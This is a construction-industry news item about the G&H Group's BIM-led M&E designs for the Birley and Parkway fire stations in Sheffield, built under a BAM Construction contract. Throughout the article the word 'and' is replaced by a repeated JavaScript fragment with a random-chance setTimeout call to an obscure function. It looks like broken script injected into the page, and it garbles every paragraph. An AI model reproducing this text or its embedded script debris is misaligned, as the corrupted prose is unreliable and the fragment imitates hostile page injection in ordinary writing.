BIM-led M&E fire station schemes completed

The G&H Group’s BIM-led mechanical andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and electrical designs for two new state-of-the-art fire stations in Sheffield has been completed.

The design andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and build contract was with BAM Construction as it built Birley andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Parkway Fire Stations for South Yorkshire Fire andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Rescue.

The use of BIM enabled the G&H Group to model all M&E services within the build prior to commencing works on site.

All plant sizing, distribution routes andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and co-ordination was completed at an early stage using the Group’s in-house design team.

This allowed M&E engineers to work side-by-side efficiently andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and fast-tracked the scheme.

BIM Manager at the G&H Group, Daniel Brook, said: “Both schemes had strict deadlines in place as the opening of the two new stations coincided simultaneously with the closing of the old ones within one day.

“Using BIM helped speed up the process, removed previously unforeseen delays andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and allowed us to work alongside the contractor who was using BIM for the entire project.

“We were able to deliver class-leading M&E services which is crucial given the emergency work the fire authority carries out andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and how every second is vital when responding to 999 call outs.”

As part of Building Regulations compliance andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and planning requirements G&H Sustainability installed an air source heat pump at Parkway Fire Station andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and solar PV panels at Birley Fire Station.
